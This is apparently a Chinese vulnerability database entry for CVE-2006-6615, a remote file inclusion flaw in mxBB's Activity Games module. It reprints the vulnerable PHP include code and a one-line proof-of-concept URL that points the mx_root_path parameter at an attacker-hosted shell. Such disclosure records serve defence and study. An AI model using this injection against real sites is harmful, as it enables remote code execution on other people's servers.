MXBB Activity Games 模块'Act_Constants.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111757 漏洞类型 输入验证
发布时间 2006-12-11 更新时间 2006-12-18
CVE编号 CVE-2006-6615 CNNVD-ID CNNVD-200612-378
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2919
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-378
|漏洞详情
mxBB的ActivityGames(mx_act)0.92模块中的includes/act_constants.php存在PHP远程文件包含漏洞,远程攻击者可以通过module_root_path参数中的URL执行任意PHP代码。
|漏洞EXP
# mx_act (mxBB Games Module)   --Remote File Inclusion Exploit
# Bug Found & Exploit [c]oded By Dr Max Virus
# Download:http://www.mx-system.com/index.php?page=4&action=file&file_id=71

Problem area:

	if ( !file_exists($mx_root_path . 'modules/mx_act/language/lang_' . $board_config['default_lang'] . '/lang_activity.'.$phpEx ) )
	{
	  	include( $mx_root_path . 'modules/mx_act/language/lang_english/lang_activity.'.$phpEx );
		$link_language='lang_english';
	}	
	else
	{
	  	include(  $mx_root_path . 'modules/mx_act/language/lang_' . $board_config['default_lang'] . '/lang_activity.'.$phpEx );
		$link_language='lang_' . $board_config['default_lang'];
	} 

PoC:
	
	http://site.com/mxBB/modules/mx_act/include/constants/act_constants.php?mx_root_path=http://[yourshell]?&	
	

# exploit was broken and removed. /str0ke

# milw0rm.com [2006-12-11]
|参考资料

来源:XF
名称:mxbbgames-act-file-include(30822)
链接:http://xforce.iss.net/xforce/xfdb/30822
来源:BID
名称:21547
链接:http://www.securityfocus.com/bid/21547
来源:MILW0RM
名称:2919
链接:http://www.milw0rm.com/exploits/2919
来源:VUPEN
名称:ADV-2006-4945
链接:http://www.frsirt.com/english/advisories/2006/4945
来源:MILW0RM
名称:2919
链接:http://milw0rm.com/exploits/2919